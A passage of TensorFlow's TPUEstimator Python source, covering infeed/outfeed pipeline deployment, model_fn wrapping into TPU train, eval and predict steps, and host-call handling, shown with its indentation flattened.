signals=unflattened_inputs.get('signals'))
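# Illustrative round trip (a sketch, not executed here): the same recorder
# instance that flattened the inputs on the host side restores the structure
# on the TPU side:
#
#   recorder = _InputPipeline.InputsStructureRecorder()
#   flat_list = recorder.flatten_features_and_labels(features, labels)
#   inputs = recorder.unflatten_features_and_labels(flat_list)
#   # inputs.features_and_labels() mirrors the original structure.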
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, the body function, which invokes the
# `enqueue_fn` passed in, is called to construct the graph, so the input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-core input pipeline deployment.
# Invoke the input pipeline for each core and place it on the
# corresponding host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only call input_fn on host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two scenarios:
#   num_cores_per_replica > num_cores_per_host
#   and num_cores_per_replica <= num_cores_per_host.
# First, get the set of host_ids by iterating over the replicas. We only
# want the set of *unique* host_ids *that will call input_fn*: for each
# replica, the input_fn is only called from the CPU host that contains
# logical core 0.
# Use a list here to ensure a deterministic order.
host_id_with_invocation_id_pair = []
if not self._ctx.is_replica_across_hosts():
for host_id in range(num_hosts):
invocation_index = host_id
host_id_with_invocation_id_pair.append((host_id, invocation_index))
else:
for replica_id in xrange(self._ctx.num_replicas):
invocation_index = replica_id
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_id_with_invocation_id_pair.append((host_id, invocation_index))
for (host_id, invocation_index) in host_id_with_invocation_id_pair:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id,
invocation_index))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it needs for
# dequeue is the dtypes and shapes, so any one of them can be used. Here, we
# grab the first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
should error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior) we cannot break
user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(
tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs, computation, batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes the computation inputs and builds
the computation graph. If `computation` returns m outputs, this function
will return a list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using the batching function, but still using TPUPartitionedCall across all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
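# For example (an illustrative sketch): with
#   computation_inputs = {'a': t_a, 'b': t_b}
# tf.nest.flatten yields [t_a, t_b] in a deterministic (sorted-key) order, and
# tf.nest.pack_sequence_as below rebuilds the original dict from the batched
# tensors before calling the TPU computation.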
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(
computation_inputs, tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides, the input should be taken from the TPU infeed rather
than from the input pipeline (input_fn) directly. To fit the TPU loop and
replicate pattern, the original train computation should be reformed, which is
the returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_call, captured scaffold_fn, and captured training
hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_))
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(
scaled_gradients, tf.compat.v1.train.get_global_step())
]
stopping_signals = None
user_provided_stopping_signals_name = None
if self._ctx.feed_hook is not None:
stopping_signals, user_provided_stopping_signals_name = \
self._ctx.feed_hook.get_stopping_signals_and_name(features)
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if stopping_signals is not None:
identity_fn = lambda **kwargs: kwargs
tracer_host_call[user_provided_stopping_signals_name] = [
identity_fn, stopping_signals
]
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update(
{'host_call': (lambda loss_t: loss_t, [tf.reshape(loss, [1])])})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides, the input and output are slightly different. The
input, features and labels, should be taken from the TPU infeed rather than
from the input pipeline (input_fn) directly. The output is managed in two
stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Add validation for the prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph(
)._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn(
'EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
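# For example (illustrative): with outfeed_every_n_steps=2 the enqueue op runs
# on steps 0, 2, 4, ..., and a tf.no_op() is returned on all other steps.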
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [
tf.compat.v1.cond(
tf.math.equal(
tf.math.floormod(step, self._outfeed_every_n_steps),
0), lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())
]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn, which
is executed on the first host.
Returns:
A dictionary mapping each recorded name to the return value of the
host_call registered under that name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on a single-host TPU system, so
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(
self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(tf.compat.v2.summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class _NotSaver(object):
"""What to pass instead of a saver object if you don't want saving."""
def __init__(self, message):
self._message = message
def save(self, *args, **kwargs):
del args, kwargs
tf.compat.v1.logging.info(self._message)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(
tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
